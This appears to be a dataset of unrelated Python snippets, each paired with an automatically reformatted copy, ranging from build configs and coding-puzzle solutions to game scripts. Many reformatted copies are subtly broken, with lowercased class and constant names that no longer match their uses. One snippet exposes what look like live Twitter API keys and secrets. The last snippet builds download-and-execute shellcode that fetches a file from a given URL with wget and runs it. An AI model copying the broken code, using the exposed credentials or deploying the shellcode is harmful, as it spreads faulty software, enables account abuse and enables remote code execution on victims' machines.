(118, 144), (119, 127), (119, 145), (119, 146), (119, 147), (119, 148), (119, 150), (120, 127), (120, 129), (120, 130), (120, 131), (120, 132), (120, 133), (120, 134), (120, 135), (120, 136), (120, 137), (120, 138), (120, 139), (120, 140), (120, 141), (120, 142), (120, 143), (120, 144), (120, 150), (121, 126), (121, 128), (121, 129), (121, 130), (121, 131), (121, 132), (121, 133), (121, 134), (121, 135), (121, 136), (121, 137), (121, 138), (121, 139), (121, 140), (121, 141), (121, 142), (121, 143), (121, 144), (121, 145), (121, 146), (121, 147), (121, 148), (121, 150), (122, 126), (122, 128), (122, 129), (122, 130), (122, 131), (122, 132), (122, 133), (122, 134), (122, 135), (122, 136), (122, 137), (122, 138), (122, 139), (122, 140), (122, 141), (122, 142), (122, 143), (122, 144), (122, 145), (122, 146), (122, 147), (122, 148), (122, 150), (123, 127), (123, 129), (123, 130), (123, 131), (123, 132), (123, 133), (123, 134), (123, 135), (123, 136), (123, 137), (123, 138), (123, 139), (123, 140), (123, 141), (123, 142), (123, 143), (123, 144), (123, 145), (123, 146), (123, 147), (123, 149), (124, 127), (124, 129), (124, 130), (124, 131), (124, 132), (124, 133), (124, 134), (124, 135), (124, 136), (124, 137), (124, 138), (124, 139), (124, 140), (124, 141), (124, 142), (124, 143), (124, 144), (124, 145), (124, 146), (124, 147), (124, 149), (125, 127), (125, 129), (125, 130), (125, 131), (125, 132), (125, 133), (125, 134), (125, 135), (125, 136), (125, 137), (125, 138), (125, 139), (125, 140), (125, 141), (125, 142), (125, 143), (125, 149), (126, 127), (126, 145), (126, 146), (126, 147), (126, 148), (127, 128), (127, 130), (127, 131), (127, 132), (127, 133), (127, 134), (127, 135), (127, 136), (127, 137), (127, 138), (127, 139), (127, 140), (127, 141), (127, 143)) coordinates_7_a8732 = ((110, 82), (111, 81), (111, 82), (112, 68), (112, 69), (112, 70), (112, 71), (112, 72), (112, 80), (113, 66), (113, 68), (113, 74), (113, 76), (113, 77), (113, 78), (113, 81), (114, 65), (114, 67), (114, 75), (114, 79), (114, 81), (115, 64), (115, 67), (115, 76), (115, 78), (116, 63), (116, 66), (116, 67), (116, 68), (117, 62), (117, 63), (117, 66), (117, 68), (117, 69), (117, 70), (117, 71), (117, 73), (118, 62), (118, 66), (118, 70), (118, 74), (119, 63), (119, 70), (119, 72), (119, 74), (120, 65), (120, 68), (120, 75), (121, 68), (121, 69), (121, 70), (121, 71), (121, 72), (121, 74), (122, 72)) coordinates_cc5_b45 = ((151, 96), (152, 96), (153, 96), (154, 93), (154, 96), (155, 92), (155, 94), (155, 95), (156, 91), (156, 92), (157, 90), (158, 88), (158, 89), (159, 86), (159, 88), (160, 87), (161, 85), (161, 86), (161, 92), (161, 94), (161, 105), (161, 107), (161, 108), (161, 110), (162, 85), (162, 90), (162, 95), (162, 106), (162, 109), (163, 82), (163, 84), (163, 89), (163, 93), (163, 95), (163, 106), (163, 109), (164, 80), (164, 83), (164, 88), (164, 91), (164, 94), (164, 95), (164, 107), (164, 109), (165, 79), (165, 82), (165, 87), (165, 89), (165, 93), (165, 96), (166, 79), (166, 82), (166, 85), (166, 88), (166, 94), (166, 96), (167, 79), (167, 81), (167, 82), (167, 83), (167, 84), (167, 87), (167, 94), (167, 96), (168, 80), (168, 81), (168, 82), (168, 83), (168, 86), (168, 95), (168, 96), (169, 80), (169, 82), (169, 83), (169, 84), (169, 86), (169, 95), (169, 96), (170, 81), (170, 83), (170, 85), (171, 81), (171, 84), (172, 82), (172, 83)) coordinates_27408_b = ((107, 98), (108, 87), (108, 96), (108, 98), (109, 85), (109, 87), (109, 95), (109, 97), (110, 85), (110, 87), (110, 94), (110, 96), (111, 84), (111, 86), (111, 91), (111, 92), (111, 96), (112, 84), (112, 86), (112, 90), (112, 95), (113, 83), (113, 85), (113, 89), (113, 91), (113, 92), (113, 94), (114, 83), (114, 85), (114, 88), (114, 90), (114, 91), (114, 93), (115, 83), (115, 85), (115, 88), (115, 90), (115, 92), (116, 83), (116, 85), (116, 88), (116, 89), (116, 91), (117, 83), (117, 85), (117, 88), (117, 89), (117, 91), (118, 84), (118, 87), (118, 88), (118, 89), (118, 91), (119, 84), (119, 86), (119, 87), (119, 88), (119, 89), (119, 91), (120, 84), (120, 91), (121, 85), (121, 87), (121, 88), (121, 89), (121, 91)) coordinates_006400 = ((90, 135), (91, 135), (92, 135), (93, 134), (93, 135), (94, 134), (94, 135), (95, 134), (95, 135), (96, 135), (97, 133), (97, 135), (98, 133), (98, 135), (99, 133), (99, 136), (100, 133), (100, 136), (101, 134), (101, 137), (102, 134), (102, 136), (102, 139), (103, 132), (103, 134), (103, 135), (103, 136), (103, 137), (103, 140), (104, 132), (104, 134), (104, 135), (104, 136), (104, 137), (104, 139), (105, 132), (105, 134), (105, 135), (105, 136), (105, 138), (106, 132), (106, 134), (106, 135), (106, 136), (106, 138), (107, 132), (107, 134), (107, 135), (107, 137), (108, 132), (108, 134), (108, 136), (109, 132), (109, 135), (110, 132), (110, 134), (111, 132), (111, 133), (112, 132), (113, 131)) coordinates_e1_b7_e7 = ((120, 159), (121, 158), (121, 160), (122, 157), (122, 159), (122, 161), (123, 159), (123, 161), (124, 157), (124, 160), (125, 158), (125, 159))
{ 'targets': [ { 'target_name': 'cpu_features', 'type': 'static_library', 'cflags': [ '-O3' ], 'include_dirs': [ 'include', 'include/internal', ], 'sources': [ 'include/cpu_features_cache_info.h', 'include/cpu_features_macros.h', # utils 'include/internal/bit_utils.h', 'include/internal/filesystem.h', 'include/internal/stack_line_reader.h', 'include/internal/string_view.h', 'src/filesystem.c', 'src/stack_line_reader.c', 'src/string_view.c', ], 'conditions': [ ['target_arch in "mips mipsel mips64 mips64el"', { 'sources': [ 'include/cpuinfo_mips.h', 'src/cpuinfo_mips.c', ], }], ['target_arch=="arm"', { 'sources': [ 'include/cpuinfo_arm.h', 'src/cpuinfo_arm.c', ], }], ['target_arch=="arm64"', { 'sources': [ 'include/cpuinfo_aarch64.h', 'src/cpuinfo_aarch64.c', ], }], ['target_arch in "ia32 x32 x64"', { 'sources': [ 'include/internal/cpuid_x86.h', 'include/cpuinfo_x86.h', 'src/cpuinfo_x86.c', ], }], ['target_arch in "ppc ppc64"', { 'sources': [ 'include/cpuinfo_ppc.h', 'src/cpuinfo_ppc.c', ], }], ['OS=="mac" and target_arch in "ia32 x32 x64"', { 'defines': [ 'HAVE_SYSCTLBYNAME=1', ], }], ], 'defines': [ 'NDEBUG', 'STACK_LINE_READER_BUFFER_SIZE=1024', ], # Use generated config 'includes': [ '../../buildcheck.gypi', ], 'direct_dependent_settings': { 'include_dirs': [ 'include', ], 'defines': [ # Manually-tracked git revision 'CPU_FEATURES_VERSION_REV=545b2e84ec68f4364be1e89309a1404575689226', ], }, }, ], }
{'targets': [{'target_name': 'cpu_features', 'type': 'static_library', 'cflags': ['-O3'], 'include_dirs': ['include', 'include/internal'], 'sources': ['include/cpu_features_cache_info.h', 'include/cpu_features_macros.h', 'include/internal/bit_utils.h', 'include/internal/filesystem.h', 'include/internal/stack_line_reader.h', 'include/internal/string_view.h', 'src/filesystem.c', 'src/stack_line_reader.c', 'src/string_view.c'], 'conditions': [['target_arch in "mips mipsel mips64 mips64el"', {'sources': ['include/cpuinfo_mips.h', 'src/cpuinfo_mips.c']}], ['target_arch=="arm"', {'sources': ['include/cpuinfo_arm.h', 'src/cpuinfo_arm.c']}], ['target_arch=="arm64"', {'sources': ['include/cpuinfo_aarch64.h', 'src/cpuinfo_aarch64.c']}], ['target_arch in "ia32 x32 x64"', {'sources': ['include/internal/cpuid_x86.h', 'include/cpuinfo_x86.h', 'src/cpuinfo_x86.c']}], ['target_arch in "ppc ppc64"', {'sources': ['include/cpuinfo_ppc.h', 'src/cpuinfo_ppc.c']}], ['OS=="mac" and target_arch in "ia32 x32 x64"', {'defines': ['HAVE_SYSCTLBYNAME=1']}]], 'defines': ['NDEBUG', 'STACK_LINE_READER_BUFFER_SIZE=1024'], 'includes': ['../../buildcheck.gypi'], 'direct_dependent_settings': {'include_dirs': ['include'], 'defines': ['CPU_FEATURES_VERSION_REV=545b2e84ec68f4364be1e89309a1404575689226']}}]}
n = int(input()) r = 0 l = n - 1 right_diagonal = 0 left_diagonal = 0 for x in range(n): line = input() numbers = list( map( int, line.split() ) ) right_diagonal += numbers[r] left_diagonal += numbers[l] r += 1 l -= 1 print( abs( right_diagonal - left_diagonal ) )
n = int(input()) r = 0 l = n - 1 right_diagonal = 0 left_diagonal = 0 for x in range(n): line = input() numbers = list(map(int, line.split())) right_diagonal += numbers[r] left_diagonal += numbers[l] r += 1 l -= 1 print(abs(right_diagonal - left_diagonal))
class Animal: @staticmethod def eat(): return "eating..." class Dog(Animal): # Single Inheritance @staticmethod def bark(): return "barking..." a = Animal() print(a.eat()) dog = Dog() print(dog.eat()) print(dog.bark())
class Animal: @staticmethod def eat(): return 'eating...' class Dog(Animal): @staticmethod def bark(): return 'barking...' a = animal() print(a.eat()) dog = dog() print(dog.eat()) print(dog.bark())
#!/usr/bin/env python # # ---------------------------------------------------------------------- # # Brad T. Aagaard, U.S. Geological Survey # Charles A. Williams, GNS Science # Matthew G. Knepley, University of Chicago # # This code was developed as part of the Computational Infrastructure # for Geodynamics (http://geodynamics.org). # # Copyright (c) 2010-2017 University of California, Davis # # See COPYING for license information. # # ---------------------------------------------------------------------- # ## @file pylith/faults/__init__.py ## ## @brief Python PyLith faults module initialization __all__ = ['BruneSlipFn', 'ConstRateSlipFn', 'EqKinSrc', 'Fault', 'FaultCohesive', 'FaultCohesiveKin', 'FaultCohesiveDyn', 'SlipTimeFn', 'SingleRupture', 'StepSlipFn', ] # End of file
__all__ = ['BruneSlipFn', 'ConstRateSlipFn', 'EqKinSrc', 'Fault', 'FaultCohesive', 'FaultCohesiveKin', 'FaultCohesiveDyn', 'SlipTimeFn', 'SingleRupture', 'StepSlipFn']
class SlackException(Exception): pass class SlackConnectionError(SlackException): pass class SlackReadError(SlackException): pass
class Slackexception(Exception): pass class Slackconnectionerror(SlackException): pass class Slackreaderror(SlackException): pass
# Summing numbers def summer(nums): total = 0 numbers = nums.split(" ") for num in numbers: total += int(num) return total print(summer(input("Enter nums: ")))
def summer(nums): total = 0 numbers = nums.split(' ') for num in numbers: total += int(num) return total print(summer(input('Enter nums: ')))
def getcard(): print('please enter card number') card=str(input()).split(' ') return card def luhn(card): reverse='' temp='' for z in card: reverse=z+reverse total=0 for x in range(0, len(reverse)): if x==0 or x%2==0: temp=temp+reverse[x] else: temp=temp+str(int(reverse[x])*2) for y in temp: total=total+int(y) return total%10==0 testcard1='1234567890123452' testcard2='4077142043835313' testcard3='1234567890123453' print('test 1 result=',luhn(testcard1)) print('test 2 result=',luhn(testcard2)) print('test 3 result=',luhn(testcard3))
def getcard(): print('please enter card number') card = str(input()).split(' ') return card def luhn(card): reverse = '' temp = '' for z in card: reverse = z + reverse total = 0 for x in range(0, len(reverse)): if x == 0 or x % 2 == 0: temp = temp + reverse[x] else: temp = temp + str(int(reverse[x]) * 2) for y in temp: total = total + int(y) return total % 10 == 0 testcard1 = '1234567890123452' testcard2 = '4077142043835313' testcard3 = '1234567890123453' print('test 1 result=', luhn(testcard1)) print('test 2 result=', luhn(testcard2)) print('test 3 result=', luhn(testcard3))
# -*- coding: utf-8 -*- __author__ = 'Jordan Woerndle' __email__ = 'jordan52@gmail.com' __version__ = '0.1.0'
__author__ = 'Jordan Woerndle' __email__ = 'jordan52@gmail.com' __version__ = '0.1.0'
def loadDataSet(): dataMat = [] labelMat = [] fr = open('testSet.txt') for line in fr.readLines(): lineArr = line.strip().split() dataMat.append([1, 0, ])
def load_data_set(): data_mat = [] label_mat = [] fr = open('testSet.txt') for line in fr.readLines(): line_arr = line.strip().split() dataMat.append([1, 0])
print('\n') print(f'The __name__ of main_test.py is: {__name__}') print('\n') def print_function(): print('\n') print(f'FROM FUNCTION: The __name__ of main_test.py is: {__name__}') print('\n') def some_function(): print('I AM SOME FUNCTION') if __name__ == '__main__': print_function()
print('\n') print(f'The __name__ of main_test.py is: {__name__}') print('\n') def print_function(): print('\n') print(f'FROM FUNCTION: The __name__ of main_test.py is: {__name__}') print('\n') def some_function(): print('I AM SOME FUNCTION') if __name__ == '__main__': print_function()
n = input() def mul(n): if len(n)==1: return n[0] return mul(n[1:])*n[0] def fac(n): if n==1: return 1 return fac(n-1)*n def ap(h,n): if len(n)==0: print(h) for k in sorted(set(n)): t = list(n) t.remove(k) ap(h+k,t) print(fac(len(n))//mul([fac(n.count(x)) for x in set(n)])) ap('',n)
n = input() def mul(n): if len(n) == 1: return n[0] return mul(n[1:]) * n[0] def fac(n): if n == 1: return 1 return fac(n - 1) * n def ap(h, n): if len(n) == 0: print(h) for k in sorted(set(n)): t = list(n) t.remove(k) ap(h + k, t) print(fac(len(n)) // mul([fac(n.count(x)) for x in set(n)])) ap('', n)
points = [] distances = [] number_of_cases = int(input()) for x in range(number_of_cases): number_of_points = int(input()) for y in range(number_of_points): point = list(input().split()) points.append(point) distances.append((int(point[1]) ** 2 + int(point[2]) ** 2) ** (1/2)) distances_sorted, points_sorted = zip(*sorted(zip(distances, points))) for i in points_sorted: print(*i) points.clear() distances.clear() input()
points = [] distances = [] number_of_cases = int(input()) for x in range(number_of_cases): number_of_points = int(input()) for y in range(number_of_points): point = list(input().split()) points.append(point) distances.append((int(point[1]) ** 2 + int(point[2]) ** 2) ** (1 / 2)) (distances_sorted, points_sorted) = zip(*sorted(zip(distances, points))) for i in points_sorted: print(*i) points.clear() distances.clear() input()
pairs = { "(": ")", "[": "]", "{": "}", "<": ">", } scores = { ")": 3, "]": 57, "}": 1197, ">": 25137, } with open('./input', encoding='utf8') as file: lines = [line.strip() for line in file.readlines()] score = 0 for line in lines: next_char = [] for char in line: if char in pairs: next_char.append(pairs[char]) elif char == next_char[-1]: next_char.pop() else: score += scores[char] break print(score)
pairs = {'(': ')', '[': ']', '{': '}', '<': '>'} scores = {')': 3, ']': 57, '}': 1197, '>': 25137} with open('./input', encoding='utf8') as file: lines = [line.strip() for line in file.readlines()] score = 0 for line in lines: next_char = [] for char in line: if char in pairs: next_char.append(pairs[char]) elif char == next_char[-1]: next_char.pop() else: score += scores[char] break print(score)
n = 0 i = 0 while True: try: e = input() n += int(input()) i += 1 except EOFError: print('{:.1f}'.format(float(n / i))) break
n = 0 i = 0 while True: try: e = input() n += int(input()) i += 1 except EOFError: print('{:.1f}'.format(float(n / i))) break
routes = { '/': { "controller": "home.index", "accepted_method": "GET,POST" }, '/user': { "controller": "user.index", "accepted_method": "GET" }, '/user/create': { "controller": "user.create", "accepted_method": "POST" } }
routes = {'/': {'controller': 'home.index', 'accepted_method': 'GET,POST'}, '/user': {'controller': 'user.index', 'accepted_method': 'GET'}, '/user/create': {'controller': 'user.create', 'accepted_method': 'POST'}}
class BaseAction(object): method: str = None args: list = [] kwargs: dict = {} def __repr__(self): return '<{} m={}, a={}, k={}>'.format( self.__class__.__name__, self.method, self.args, self.kwargs, ) class DatabaseAction(BaseAction): pass
class Baseaction(object): method: str = None args: list = [] kwargs: dict = {} def __repr__(self): return '<{} m={}, a={}, k={}>'.format(self.__class__.__name__, self.method, self.args, self.kwargs) class Databaseaction(BaseAction): pass
try: unicode except NameError: basestring = unicode = str
try: unicode except NameError: basestring = unicode = str
#!/usr/bin/env python3 class Bit: HIGH = 1 LOW = 0 SHORT = -1 UNDEFINED = -2 def __init__(self, value=UNDEFINED): if value not in [Bit.HIGH, Bit.LOW, Bit.SHORT, Bit.UNDEFINED]: raise ValueError("Unknown Bit value given") self.value = value def get(self): if self.value in [Bit.UNDEFINED, Bit.SHORT]: if self.value == Bit.UNDEFINED: return "undefined" else: return "short" return str(self.value) def set(self): self.value = Bit.HIGH def reset(self): self.value = Bit.LOW def set_bit(self, bit=UNDEFINED): if bit not in [Bit.HIGH, Bit.LOW, Bit.SHORT, Bit.UNDEFINED]: raise ValueError("Unknown Bit value given") self.value = bit def __and__(self, other): if not isinstance(other, Bit): raise TypeError("unsupported operand type(s) for &: 'Bit' and '" + type(other).__name__ + "'") if other.value in [Bit.SHORT, Bit.UNDEFINED]: return Bit(other.value) if self.value in [Bit.SHORT, Bit.UNDEFINED]: return Bit(self.value) return Bit(self.value & other.value) def __or__(self, other): if not isinstance(other, Bit): raise TypeError("unsupported operand type(s) for |: 'Bit' and '" + type(other).__name__ + "'") if other.value in [Bit.SHORT, Bit.UNDEFINED]: return Bit(other.value) if self.value in [Bit.SHORT, Bit.UNDEFINED]: return Bit(self.value) return Bit(self.value | other.value) def __xor__(self, other): if not isinstance(other, Bit): raise TypeError("unsupported operand type(s) for ^: 'Bit' and '" + type(other).__name__ + "'") if other.value in [Bit.SHORT, Bit.UNDEFINED]: return Bit(other.value) if self.value in [Bit.SHORT, Bit.UNDEFINED]: return Bit(self.value) return Bit(self.value ^ other.value) def __invert__(self): if self.value in [Bit.SHORT, Bit.UNDEFINED]: return Bit(self.value) if self.value == Bit.LOW: return Bit(Bit.HIGH) return Bit(Bit.LOW) def __str__(self): if self.value == Bit.HIGH: return "Bit.HIGH" elif self.value == Bit.LOW: return "Bit.LOW" elif self.value == Bit.SHORT: return "Bit.SHORT" elif self.value == Bit.UNDEFINED: return "Bit.UNDEFINED" return "[STRING UNKNOWN]" def __repr__(self): result = "" if self.value == Bit.HIGH: result = "Bit.HIGH" elif self.value == Bit.LOW: result = "Bit.LOW" elif self.value == Bit.SHORT: result = "Bit.SHORT" elif self.value == Bit.UNDEFINED: result = "Bit.UNDEFINED" else: return "[DATA UNKNOWN]" return "Bit(" + result + ")" def copy(self): return Bit(self.value)
class Bit: high = 1 low = 0 short = -1 undefined = -2 def __init__(self, value=UNDEFINED): if value not in [Bit.HIGH, Bit.LOW, Bit.SHORT, Bit.UNDEFINED]: raise value_error('Unknown Bit value given') self.value = value def get(self): if self.value in [Bit.UNDEFINED, Bit.SHORT]: if self.value == Bit.UNDEFINED: return 'undefined' else: return 'short' return str(self.value) def set(self): self.value = Bit.HIGH def reset(self): self.value = Bit.LOW def set_bit(self, bit=UNDEFINED): if bit not in [Bit.HIGH, Bit.LOW, Bit.SHORT, Bit.UNDEFINED]: raise value_error('Unknown Bit value given') self.value = bit def __and__(self, other): if not isinstance(other, Bit): raise type_error("unsupported operand type(s) for &: 'Bit' and '" + type(other).__name__ + "'") if other.value in [Bit.SHORT, Bit.UNDEFINED]: return bit(other.value) if self.value in [Bit.SHORT, Bit.UNDEFINED]: return bit(self.value) return bit(self.value & other.value) def __or__(self, other): if not isinstance(other, Bit): raise type_error("unsupported operand type(s) for |: 'Bit' and '" + type(other).__name__ + "'") if other.value in [Bit.SHORT, Bit.UNDEFINED]: return bit(other.value) if self.value in [Bit.SHORT, Bit.UNDEFINED]: return bit(self.value) return bit(self.value | other.value) def __xor__(self, other): if not isinstance(other, Bit): raise type_error("unsupported operand type(s) for ^: 'Bit' and '" + type(other).__name__ + "'") if other.value in [Bit.SHORT, Bit.UNDEFINED]: return bit(other.value) if self.value in [Bit.SHORT, Bit.UNDEFINED]: return bit(self.value) return bit(self.value ^ other.value) def __invert__(self): if self.value in [Bit.SHORT, Bit.UNDEFINED]: return bit(self.value) if self.value == Bit.LOW: return bit(Bit.HIGH) return bit(Bit.LOW) def __str__(self): if self.value == Bit.HIGH: return 'Bit.HIGH' elif self.value == Bit.LOW: return 'Bit.LOW' elif self.value == Bit.SHORT: return 'Bit.SHORT' elif self.value == Bit.UNDEFINED: return 'Bit.UNDEFINED' return '[STRING UNKNOWN]' def __repr__(self): result = '' if self.value == Bit.HIGH: result = 'Bit.HIGH' elif self.value == Bit.LOW: result = 'Bit.LOW' elif self.value == Bit.SHORT: result = 'Bit.SHORT' elif self.value == Bit.UNDEFINED: result = 'Bit.UNDEFINED' else: return '[DATA UNKNOWN]' return 'Bit(' + result + ')' def copy(self): return bit(self.value)
consumer_key = 'hD98CV5uD4rFVsYuBk8xAzpLd' consumer_secret = ' 3jrN58VAI6ZuyAmicMReMdmOPjM2o0WKaBz1FWzhFQ8TfNblkS' access_token = '81300781-vHqEdU2fgJLalyrFzsRscRAgb9zEZYC9giIzQgnoZ' access_token_secret = 'uliqVE0Ofv8sWfWGu97jUHKceLpQm8Ky4waVwKO5KzV2E'
consumer_key = 'hD98CV5uD4rFVsYuBk8xAzpLd' consumer_secret = '\t3jrN58VAI6ZuyAmicMReMdmOPjM2o0WKaBz1FWzhFQ8TfNblkS' access_token = '81300781-vHqEdU2fgJLalyrFzsRscRAgb9zEZYC9giIzQgnoZ' access_token_secret = 'uliqVE0Ofv8sWfWGu97jUHKceLpQm8Ky4waVwKO5KzV2E'
with open("./fine_tuning_data/asTSV/1kmer_tsv_data/GM12878/GM12878_enhancer_te.tsv", "r") as f: en_samples = f.readlines() f.close() with open("./fine_tuning_data/asTSV/1kmer_tsv_data/GM12878/GM12878_promoter_te.tsv", "r") as f: pr_samples = f.readlines() f.close() with open("./fine_tuning_data/asTSV/1kmer_tsv_data/GM12878/dev.tsv", "w") as f: for (en_line, pro_line) in zip(en_samples,pr_samples): label = en_line.split('\t')[1] enhancer = en_line.split('\t')[3].replace('\n', '') promoter = pro_line.split("\t")[3] merged_en_pr_line = "train\t" + label + '\t' + enhancer + '\t' + promoter # print(merged_en_pr_line.split("\t")) f.write(merged_en_pr_line) # break f.close()
with open('./fine_tuning_data/asTSV/1kmer_tsv_data/GM12878/GM12878_enhancer_te.tsv', 'r') as f: en_samples = f.readlines() f.close() with open('./fine_tuning_data/asTSV/1kmer_tsv_data/GM12878/GM12878_promoter_te.tsv', 'r') as f: pr_samples = f.readlines() f.close() with open('./fine_tuning_data/asTSV/1kmer_tsv_data/GM12878/dev.tsv', 'w') as f: for (en_line, pro_line) in zip(en_samples, pr_samples): label = en_line.split('\t')[1] enhancer = en_line.split('\t')[3].replace('\n', '') promoter = pro_line.split('\t')[3] merged_en_pr_line = 'train\t' + label + '\t' + enhancer + '\t' + promoter f.write(merged_en_pr_line) f.close()
# Manual Labor # Constants LIMBERT = 1106002 EGG = 4033196 sm.setSpeakerID(LIMBERT) selection1 = sm.sendNext("Where's the eggs? I told you to get eggs. If you broke them... Wait a second, what happened to you?\r\n #b\r\n#L0# Uh, well, you know how you told me not to mess with Bigby? Well... I kinda... He got out.#l") if selection1 == 0: sm.sendNext("What?!! I swear to every deity I can think of, you will starve to death if that dog is not in my yard by dinnertime.") else: sm.dispose() sm.completeQuestNoRewards(20033) sm.consumeItem(EGG, 10) sm.giveItem(2001500, 30) sm.giveItem(2001503, 30) sm.addLevel(2) sm.warpInstanceIn(913070004, 0) sm.dispose()
limbert = 1106002 egg = 4033196 sm.setSpeakerID(LIMBERT) selection1 = sm.sendNext("Where's the eggs? I told you to get eggs. If you broke them... Wait a second, what happened to you?\r\n #b\r\n#L0# Uh, well, you know how you told me not to mess with Bigby? Well... I kinda... He got out.#l") if selection1 == 0: sm.sendNext('What?!! I swear to every deity I can think of, you will starve to death if that dog is not in my yard by dinnertime.') else: sm.dispose() sm.completeQuestNoRewards(20033) sm.consumeItem(EGG, 10) sm.giveItem(2001500, 30) sm.giveItem(2001503, 30) sm.addLevel(2) sm.warpInstanceIn(913070004, 0) sm.dispose()
class Solution(object): def XXX(self, height): m,i,j = 0, 0, len(height)-1 while i != j: m = max(m, min(height[i],height[j])*(j-i)) if height[i] < height[j]: i += 1 else: j -= 1 return m
class Solution(object): def xxx(self, height): (m, i, j) = (0, 0, len(height) - 1) while i != j: m = max(m, min(height[i], height[j]) * (j - i)) if height[i] < height[j]: i += 1 else: j -= 1 return m
d={} i=0 c='y' while(c!=''): c=input() d[i]=c i=i+1 for j in range(0,i): if((j+1)%3==0): print(d[j])
d = {} i = 0 c = 'y' while c != '': c = input() d[i] = c i = i + 1 for j in range(0, i): if (j + 1) % 3 == 0: print(d[j])
BROKER_REL = 5 FACT_ST = 3.44 CORP_ST = 4.62 def broker_fee (broker_rel, fact_st, corp_st): return (1.000 - 0.050 * broker_rel) / 2 ** (0.1400 * fact_st + 0.06000 * corp_st) BROKER_FEE = broker_fee(BROKER_REL, FACT_ST, CORP_ST)/100 SELL_TAX= 0.75/100 def tax (buy, sell, vol, broker_fee = BROKER_FEE, sell_tax=SELL_TAX): return vol*(sell*(broker_fee+sell_tax) + buy*broker_fee) def profit_after_tax (buy, sell, vol, broker_fee = BROKER_FEE, sell_tax=SELL_TAX): return vol*(sell - buy) - tax(buy,sell,vol,broker_fee,sell_tax) MIN_INVESTMENT = 100000000 MAX_PROFIT_OVER_INVESTMENT = 1000 def good_deal(PAT, INV, TOP, POI): if INV < MIN_INVESTMENT: return False if POI > MAX_PROFIT_OVER_INVESTMENT: return False return True def rank(PAT, INV, TOP, POI): return POI*INV
broker_rel = 5 fact_st = 3.44 corp_st = 4.62 def broker_fee(broker_rel, fact_st, corp_st): return (1.0 - 0.05 * broker_rel) / 2 ** (0.14 * fact_st + 0.06 * corp_st) broker_fee = broker_fee(BROKER_REL, FACT_ST, CORP_ST) / 100 sell_tax = 0.75 / 100 def tax(buy, sell, vol, broker_fee=BROKER_FEE, sell_tax=SELL_TAX): return vol * (sell * (broker_fee + sell_tax) + buy * broker_fee) def profit_after_tax(buy, sell, vol, broker_fee=BROKER_FEE, sell_tax=SELL_TAX): return vol * (sell - buy) - tax(buy, sell, vol, broker_fee, sell_tax) min_investment = 100000000 max_profit_over_investment = 1000 def good_deal(PAT, INV, TOP, POI): if INV < MIN_INVESTMENT: return False if POI > MAX_PROFIT_OVER_INVESTMENT: return False return True def rank(PAT, INV, TOP, POI): return POI * INV
dna = input() print("A:", dna.count("A"), ", C:", dna.count("C"), ", G:", dna.count("G"), ", T:", dna.count("T")) ''' GitHub [https://github.com/Rodel-OL/python_class/blob/master/templates/Conta_Bases.py] NAME Conta_Bases.py VERSION [1.1] AUTHOR [Rodel-OL] <joserodelmar@gmail.com> [Other authors]: [Modifications] DESCRIPTION [Program that, given a DNA chain, returns the count of bases, adenine, guanine, citosine and thymine] CATEGORY [sequence analysis] USAGE [Conta_Bases.py][-options/arguments] ARGUMENTS [dna] [variable that will save the input given. Presumably a DNA chain] INPUT [DNA chain saves in the input variable dna] OUTPUT [Nucleotide bases named after their first letter along with the number of times it appears in the input sequence] EXAMPLES [Example 1: given a DNA sequence like , AAGGAUGTCGCGCGTTATTAGCCTAA output > A: 7 , C: 5 , G: 7 , T: 6] ''' ## 1. [ Enter DNA sequence ] ## 2. [ Read DNA sequence in search of any of the four letters ] ## 3. [ Print the number of times the letter was found along with the letter symbol ]
dna = input() print('A:', dna.count('A'), ', C:', dna.count('C'), ', G:', dna.count('G'), ', T:', dna.count('T')) '\n\nGitHub [https://github.com/Rodel-OL/python_class/blob/master/templates/Conta_Bases.py]\n\nNAME \n\tConta_Bases.py\n\nVERSION\n\t[1.1]\n\nAUTHOR\n\t[Rodel-OL] <joserodelmar@gmail.com>\n\t[Other authors]: [Modifications]\n\n\nDESCRIPTION\n\t[Program that, given a DNA chain, returns the count of bases, adenine, guanine, citosine and thymine]\n\nCATEGORY\n\t[sequence analysis]\n\nUSAGE\n\t[Conta_Bases.py][-options/arguments]\n\nARGUMENTS\n\t[dna] [variable that will save the input given. Presumably a DNA chain]\n \nINPUT\n\t[DNA chain saves in the input variable dna]\n \nOUTPUT\n [Nucleotide bases named after their first letter along with the number of times it appears in the input sequence]\n \nEXAMPLES\n [Example 1: given a DNA sequence like , AAGGAUGTCGCGCGTTATTAGCCTAA\n output > A: 7 , C: 5 , G: 7 , T: 6]\n\t\n\n'
class TestClass: def __init__(self) -> None: self.__opt1 = 1 @property def opt1(self): '''this is a property doc''' return self.__opt1 help(TestClass.opt1) # Help on property: # this is a property doc
class Testclass: def __init__(self) -> None: self.__opt1 = 1 @property def opt1(self): """this is a property doc""" return self.__opt1 help(TestClass.opt1)
def downloadANDexecute( url, filename): shellcode = r"\x31\xc0\xb0\x02\xcd\x80\x31\xdb\x39\xd8\x74\x3b\x31\xc9\x31\xdb\x31\xc0\x6a\x05\x89\xe1\x89\xe1\x89\xe3\xb0\xa2\xcd\x80\x31\xc9\x31\xc0\x50\xb0\x0f" shellcode += filename shellcode += r"\x89\xe3\x31\xc9\x66\xb9\xff\x01\xcd\x80\x31\xc0\x50" shellcode += filename shellcode += r"\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80\x6a\x0b\x58\x99\x52" shellcode += url shellcode += r"\x89\xe1\x52\x6a\x74\x68\x2f\x77\x67\x65\x68\x2f\x62\x69\x6e\x68\x2f\x75\x73\x72\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80" return shellcode
def download_an_dexecute(url, filename): shellcode = '\\x31\\xc0\\xb0\\x02\\xcd\\x80\\x31\\xdb\\x39\\xd8\\x74\\x3b\\x31\\xc9\\x31\\xdb\\x31\\xc0\\x6a\\x05\\x89\\xe1\\x89\\xe1\\x89\\xe3\\xb0\\xa2\\xcd\\x80\\x31\\xc9\\x31\\xc0\\x50\\xb0\\x0f' shellcode += filename shellcode += '\\x89\\xe3\\x31\\xc9\\x66\\xb9\\xff\\x01\\xcd\\x80\\x31\\xc0\\x50' shellcode += filename shellcode += '\\x89\\xe3\\x50\\x89\\xe2\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80\\x31\\xc0\\x40\\xcd\\x80\\x6a\\x0b\\x58\\x99\\x52' shellcode += url shellcode += '\\x89\\xe1\\x52\\x6a\\x74\\x68\\x2f\\x77\\x67\\x65\\x68\\x2f\\x62\\x69\\x6e\\x68\\x2f\\x75\\x73\\x72\\x89\\xe3\\x52\\x51\\x53\\x89\\xe1\\xcd\\x80' return shellcode
